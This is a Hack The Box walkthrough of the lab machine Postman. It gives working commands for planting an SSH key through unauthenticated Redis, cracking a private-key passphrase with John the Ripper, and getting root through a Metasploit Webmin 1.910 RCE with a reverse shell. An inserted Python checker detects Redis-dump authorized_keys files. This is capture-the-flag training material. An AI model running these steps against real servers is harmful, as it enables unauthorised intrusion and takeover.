
Hack The Box Writeup: Postman

Postman is an easy box on Hack The Box, but rooting it was far from easy. This was mainly due to the exploit that was available for the initial access. There was a method described in the Kali Linux Cookbook which included an action for clearing SSH keys. You guessed it, keys were cleared every time I was running the exploit.

Hack The Box Postman Infocard

[0x1] Reconnaissance & Enumeration

A standard scan with scripts, version detection and open ports. A striking feature is the presence of Redis on port 6379 and Webmin on port 10000.

nmap -sV -sC -A 10.10.10.160

Nmap scan report for 10.10.10.160
Host is up (0.027s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-server-header: MiniServ/1.910
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.75 seconds

[0x2] Initial Foothold

My guess is on the Redis service for now. Let’s try to find out whether it’s vulnerable. The redis tools are necessary for executing the exploit manually and are easy to install via apt-get.

sudo apt-get install redis-tools

The first step is to create a key pair with private and public key on my own machine. These keys will soon be used to upload to the Postman box.

ssh-keygen -t rsa

Generating public/private rsa key pair.
Enter file in which to save the key (/home/user/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/user/.ssh/id_rsa.
Your public key has been saved in /home/user/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:beHPkT0RV/HCvmeypfVMyj0q3n/GVhjs8ykudoJQeoI 
The key's randomart image is:
+---[RSA 3072]----+
| ..=|
| . o.|
| . . + .|
| + + * o |
| . S * + * .|
| E + o o * X |
| + . + X.B|
| o - OoB.|
| ..+.@=o |
+----[SHA256]-----+

I copy the contents of the public key to the file mykey.txt and add two empty lines above and below it. The padding keeps the key on a line of its own inside the binary dump that Redis will write, which is what sshd needs to pick it up.

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > mykey.txt

The last step consists of copying the public key to the box via redis-cli, so that the key from my machine is stored on the server. Before the key is usable I change the Redis working directory to /var/lib/redis/.ssh. This is the .ssh directory in the home directory of the redis user, where the key must be kept in order to be used.

cat mykey.txt | redis-cli -h 10.10.10.160 -x set team200

redis-cli -h 10.10.10.160

10.10.10.160:6379> config set dir /var/lib/redis/.ssh/
OK
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK

With the key in place I can connect via SSH without a password, using only the private key and the username redis.

ssh -i id_rsa redis@10.10.10.160
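The technique above leaves a telltale artifact: an authorized_keys file that is really a Redis RDB dump, with one parsable key line floating between binary junk. As an added example (not from the original post), the checker below approximates sshd's line-by-line parsing to show why the newline padding works and to flag such a file; the RDB-style bytes and the all-zero ed25519 key material are constructed test data, not from the box.

```python
import base64
import re
import struct

# Key types accepted in authorized_keys (common ones; approximates sshd's own list).
KEY_TYPES = [b"ssh-rsa", b"ssh-ed25519", b"ssh-dss", b"ecdsa-sha2-nistp256",
             b"ecdsa-sha2-nistp384", b"ecdsa-sha2-nistp521"]
# Like sshd, tolerate an options field (e.g. command="...") in front of the key type.
KEY_LINE = re.compile(rb"(?:^|\s)(" + b"|".join(map(re.escape, KEY_TYPES)) +
                      rb")\s+([A-Za-z0-9+/=]+)(?:\s+(.*))?$")
RDB_MAGIC = b"REDIS"  # every Redis RDB dump begins with "REDIS" + a 4-digit version

def parse_key_line(line: bytes):
    """Return (keytype, comment) if sshd would accept the line as a key, else None."""
    m = KEY_LINE.search(line.rstrip(b"\r"))
    if not m:
        return None
    try:
        blob = base64.b64decode(m.group(2), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    # SSH wire format: the blob starts with a length-prefixed copy of the key type name.
    if len(blob) < 4 or blob[4:4 + struct.unpack(">I", blob[:4])[0]] != m.group(1):
        return None
    return m.group(1).decode(), (m.group(3) or b"").decode(errors="replace")

def audit_authorized_keys(data: bytes) -> dict:
    """Report what sshd would accept and whether the file looks like a Redis dump."""
    lines = data.split(b"\n")
    accepted = [k for k in map(parse_key_line, lines) if k]
    # sshd silently skips blank lines, '#' comments and anything it cannot parse, which is
    # why the newline-padded key survives; a genuine file has no such leftover lines.
    junk = [l for l in lines if l.strip() and not l.lstrip().startswith(b"#")
            and parse_key_line(l) is None]
    magic = data.startswith(RDB_MAGIC)
    return {"rdb_magic": magic, "accepted_keys": accepted,
            "unparsable_lines": len(junk), "suspicious": magic or bool(junk)}

def fake_pubkey_line(keytype: bytes, comment: bytes) -> bytes:
    """Constructed test key: correct wire framing around all-zero key material."""
    blob = struct.pack(">I", len(keytype)) + keytype + struct.pack(">I", 32) + bytes(32)
    return keytype + b" " + base64.b64encode(blob) + b" " + comment

# Constructed samples: RDB-style header, newline-padded key, RDB-style trailer; and a clean file.
INJECTED = (b"REDIS0008\xfa\tredis-ver\x054.0.9\xfe\x00\xfb\x01\x00\x00\x07team200\x00"
            + b"\n\n" + fake_pubkey_line(b"ssh-ed25519", b"user@kali") + b"\n\n"
            + b"\xff\x8c\x12\xd4\x00\x9e\x01\x77\x41")
CLEAN = b'# ops key\ncommand="uptime",no-pty ' + fake_pubkey_line(b"ssh-ed25519", b"ops") + b"\n"
```

Run `audit_authorized_keys(open(path, "rb").read())` over each user's authorized_keys; the RDB magic alone is conclusive, and unparsable lines in an otherwise working file deserve a look.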

[0x3] Path to User flag

Now that I have an SSH session I check the home directory to see which other users are present on this box. I only run into a user Matt in /home.

cd /home
ls

Matt

The machine does not contain many interesting folders and files. There is a file in the /opt directory that normally wouldn’t be there. The file id_rsa.bak appears to be a backup file of a key. This key may belong to the user Matt.

cd /opt
ls

id_rsa.bak

I copy the contents of id_rsa.bak to my own machine and create the file here. The content clearly shows that this is a private key. Useful!

cat id_rsa.bak

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

An SSH key cannot be processed directly by John The Ripper. Using ssh2john, I convert the file into a workable format and save it in a new file called id_rsa_ready4john.txt.

python /usr/share/john/ssh2john.py id_rsa | tee id_rsa_ready4john.txt

Passwords within Hack The Box can generally be found with the rockyou wordlist. John the Ripper gets to work retrieving the passphrase of the private key and is done within 8 seconds.

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_ready4john.txt

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:08 DONE (2020-02-08 19:23) 0.1133g/s 1626Kp/s 1626Kc/s 1626KC/sa6_123..*7¡Vamos!
Session completed

There we have it, the password of the private key: computer2008.

computer2008 (id_rsa)

My first guess is that the private key makes it possible to log in via SSH, just like with the user ‘redis’. New to me is the message that it is an unprotected key. This turns out to be a file permission issue.

ssh -i id_rsa Matt@10.10.10.160

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions

Adjusting the permissions with chmod 600 is enough to satisfy that check.

chmod 600 id_rsa

Unfortunately, logging in with Matt’s account over SSH is not possible because his account is denied SSH access. Still, I now have his password and can use the account to potentially grab the user flag. Using su from the redis session I switch to Matt’s account and successfully log in with the cracked password.

su Matt

whoami
Matt

Once logged in as Matt, it is only a matter of checking whether the user flag can be found in the well-known place.

cat /home/Matt/user.txt
517ad0ec2458ca97af8d93aac08a2f3c

[0x4] Path to Root flag

Now looking for the root flag. While scanning the box, I came across port 10000 known as Webmin’s default port. Chances are Webmin is part of the path to root. According to my Nmap scan, version 1.910 is running.

10000/tcp open http MiniServ 1.910 (Webmin httpd)

Through my browser I can indeed see that Webmin is active on this port. Webmin is software for managing a server and is often used by hosting providers. You can compare it with, for example, Plesk.

Chances are there is a vulnerability in Webmin that can be used to gain root access to Postman. Via Searchsploit I check whether there are known vulnerabilities for this version of Webmin.

searchsploit Webmin

-------------------------------------------------------------------------- ----------------------------------------
 Exploit Title | Path (/usr/share/exploitdb/)
-------------------------------------------------------------------------- ----------------------------------------
DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal | exploits/cgi/webapps/23535.txt
Webmin - Brute Force / Command Execution | exploits/multiple/remote/705.pl
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing | exploits/linux/remote/22275.pl
Webmin 0.x - 'RPC' Privilege Escalation | exploits/linux/remote/21765.pl
Webmin 0.x - Code Input Validation | exploits/linux/local/21348.txt
Webmin 1.5 - Brute Force / Command Execution | exploits/multiple/remote/746.pl
Webmin 1.5 - Web Brute Force (CGI) | exploits/multiple/remote/745.pl
Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit) | exploits/unix/remote/21851.rb
Webmin 1.850 - Multiple Vulnerabilities | exploits/cgi/webapps/42989.txt
Webmin 1.900 - Remote Command Execution (Metasploit) | exploits/cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit) | exploits/linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution | exploits/linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit) | exploits/linux/remote/47230.rb
Webmin 1.x - HTML Email Command Execution | exploits/cgi/webapps/24574.txt
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP) | exploits/multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl) | exploits/multiple/remote/2017.pl
phpMyWebmin 1.0 - 'target' Remote File Inclusion | exploits/php/webapps/2462.txt
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion | exploits/php/webapps/2451.txt
webmin 0.91 - Directory Traversal | exploits/cgi/remote/21183.txt
--------------------------------------------------------------------------------------------------- ----------------------------------------

Bingo, there is a vulnerability in version 1.910 where a Remote Command Execution (RCE) is possible in the Package Update function.

Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit) | exploits/linux/remote/46984.rb

Time to fire up Metasploit. The exploit is most likely already present in the standard modules. If not, it can always be added manually of course.

msfconsole
       =[ metasploit v5.0.72-dev ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

The Webmin exploit module is indeed present in Metasploit as exploit/linux/http/webmin_packageup_rce. It is a Remote Code Execution vulnerability that makes it possible to get a shell as the user under which Webmin is running in the background.

msf5 > search webmin
Matching Modules
================
   # Name Disclosure Date Rank Check Description
   - ---- --------------- ---- ----- -----------
   0 auxiliary/admin/webmin/edit_html_fileaccess 2012-09-06 normal No Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
   1 auxiliary/admin/webmin/file_disclosure 2006-06-30 normal No Webmin File Disclosure
   2 exploit/linux/http/webmin_backdoor 2019-08-10 excellent Yes Webmin password_change.cgi Backdoor
   3 exploit/linux/http/webmin_packageup_rce 2019-05-16 excellent Yes Webmin Package Updates Remote Command Execution
   4 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution
   5 exploit/unix/webapp/webmin_upload_exec 2019-01-17 excellent Yes Webmin Upload Authenticated RCE

To use the exploit it is necessary to have a Webmin account. That’s good because Matt’s account is suitable for this. The website runs via HTTPS, so SSL must also be set to true.

msf5 > use exploit/linux/http/webmin_packageup_rce 

msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD computer2008
PASSWORD => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 10.10.10.160
RHOSTS => 10.10.10.160
msf5 exploit(linux/http/webmin_packageup_rce) > set username Matt
username => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 10.10.14.103
LHOST => 10.10.14.103
msf5 exploit(linux/http/webmin_packageup_rce) > set SSL true
SSL => true

The exploit runs successfully and a command shell opens neatly. I upgrade the command shell to a full shell by means of the shell command.

msf5 exploit(linux/http/webmin_packageup_rce) > exploit

[*] Started reverse TCP handler on 10.10.14.103:4444 
[+] Session cookie: c185d9f5bf7e67c165089eb362c2b59b
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.103:4444 -> 10.10.10.160:34076) at 2020-02-08 20:05:47 +0000

shell

[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell

The shell starts in the package-updates folder on Postman. By means of whoami I see that I have a shell on Postman as root, and now the only thing left to do is grab the root flag.

pwd
/usr/share/webmin/package-updates/

# whoami
whoami
root

There it is, 32 characters long and the end point of this Redis / Webmin box. Personally, I thought this was the least fun box so far. This is purely due to the Redis exploits used by other hackers, which issue a FLUSHALL command. That meant my newly placed key was deleted again and again.

# cat /root/root.txt
a257741c5bed8be7778c6ed95686ddce


All information in this post is for educational use only! Do not use it against others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail!
Source
Hack The Box



d0p4m1n3

Ethical Hacker | Cybersecurity enthusiast | Always looking to expand my knowledge | got root?
